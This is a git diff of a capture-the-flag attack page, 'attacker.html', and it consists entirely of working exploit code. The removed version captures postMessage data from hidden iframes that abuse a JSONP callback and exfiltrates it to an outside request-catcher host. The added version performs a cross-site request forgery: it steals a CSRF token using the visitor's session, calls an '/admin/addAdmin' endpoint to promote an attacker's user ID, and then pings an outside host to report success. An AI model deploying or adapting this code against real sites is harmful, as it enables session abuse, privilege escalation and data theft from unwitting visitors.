--- a/attacker.html
+++ b/attacker.html
@@ -1,28 +1,38 @@
-<!doctype html>
-<meta charset="utf-8">
-<title>CTF exploit</title>
+<!doctype html><meta charset="utf-8"><title>promote</title>
 <script>
-const EXFIL_URL = "https://ucurxln.request.dreamhack.games/collect?d=";
+(async ()=>{
+  const V = 'http://web1-79e4a3bc.p1.securinets.tn';
 
-window.addEventListener('message', (ev) => {
+  let t = '';
   try {
-    const data = ev.data && (typeof ev.data === 'string' ? {info: ev.data} : ev.data);
-    const msg = (data && (data.info ?? data)) + "";
-    try { fetch(EXFIL_URL + encodeURIComponent(msg)); } catch (e) {}
-    try { (new Image).src = EXFIL_URL + encodeURIComponent(msg); } catch (e) {}
-  } catch (e) {}
-});
+    const r = await fetch(V+'/csrf-token', {credentials:'include'});
+    t = (await r.json()).csrfToken;
+  } catch(e) {}
 
-const f1 = document.createElement('iframe');
-f1.src = "http://home:8001/post";
-f1.style.cssText = "width:0;height:0;border:0;";
-document.body.appendChild(f1);
+  const ATTACKER_ID = 72;   
+  if (t) {
+    await fetch(V+'/admin/addAdmin', {
+      method: 'POST',
+      credentials: 'include',
+      headers: {'Content-Type':'application/json', 'CSRF-Token': t},
+      body: JSON.stringify({ userId: ATTACKER_ID })
+    });
+  }
+  if (!t) {
+    try {
+      const r = await fetch(V+'/csrf-token', {credentials:'include'});
+      t = (await r.json()).csrfToken;
+    } catch(e){}
+    if (t) {
+      const params = new URLSearchParams({_csrf:t, userId:String(ATTACKER_ID)});
+      await fetch(V+'/admin/addAdmin', {
+        method:'POST', credentials:'include',
+        headers:{'Content-Type':'application/x-www-form-urlencoded'},
+        body: params.toString()
+      });
+    }
+  }
 
-setTimeout(() => {
-  const f2 = document.createElement('iframe');
-  f2.src = "http://home:8001/callback?callback=parent.postMessage";
-  f2.style.cssText = "width:0;height:0;border:0;";
-  document.body.appendChild(f2);
-}, 1500);
+  new Image().src='https://xqimudd.request.dreamhack.games/?d=promoted';
+})();
 </script>
-<p>Working…</p>
